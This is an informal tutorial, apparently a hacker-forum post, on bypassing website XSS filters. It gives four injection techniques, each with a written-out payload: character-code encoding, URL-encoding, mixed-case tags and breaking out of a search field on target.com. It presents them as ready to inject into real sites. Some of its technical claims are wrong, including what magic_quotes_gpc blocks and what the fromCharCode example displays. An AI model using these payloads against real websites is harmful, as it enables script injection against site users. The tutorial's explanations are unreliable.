This topic is divided into 2 parts :
[1] Introduction :
Now a days many websites are using some filters to secure their websites from XSS injection. But I have something which can bypass filters. Let;s discuss them.
[2] Types of filters :
We will learn, how to bypass these xss filters :
[+]Bypass magic_quotes_gpc (if it's on )
[+]Bypass with cryption in full html
[+]Bypass with Obfuscation
[+]Bypass with trying around method
[+]Bypass magic_quotes_gpc
When magic_quotes_gpc is on, it means that the server doesn't allow, ", / and ' (it depends)
to bypass it we use :
String.fromCharCode()
We write our code, in the () crypted in ASCII
exemple :
String.fromCharCode(107, 51, 110, 122, 48)
(Here I crypted k3nz0 in ascii : 107, 51, 110, 122, 48
And we use it :
<script>String.fromCharCode(107, 51, 110, 122, 48)</script>
We will see : k3nz0
We bypassed magic_quotes_gpc :)
[+] Bypass with cryption in full html :
Very simple, we have to encode our code in full HTTP!
Our code : <script>alert('i am here')</script>
And in full HTTP :
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%69%20%61%6D%20%68%65%72%65%27%29%3C%2F%73%63%72%69%70%74%3E
Now, you can inject it :) !
Notice that you can use the tool "Coder" to do encode it in full HTTP
We bypassed filter.
[+] Bypass with Obfuscation :
Very simple too, this filter, don't allows for exemple these words :
-script
-alert
To bypass it, you change "script" with for exemple "sCriPt", and "alert" with "ALerT" !
For exemple :
<ScriPt>ALeRt("i am here")</scriPt>
We bypassed the filter.
[+] Bypass with trying around method :
Generally, it is in the searchs scripts, we just add "> at the begining to close current fields :
exemple :
http://target.com/search.php?search="><script>alert("hello")</script>
We bypassed the filter.
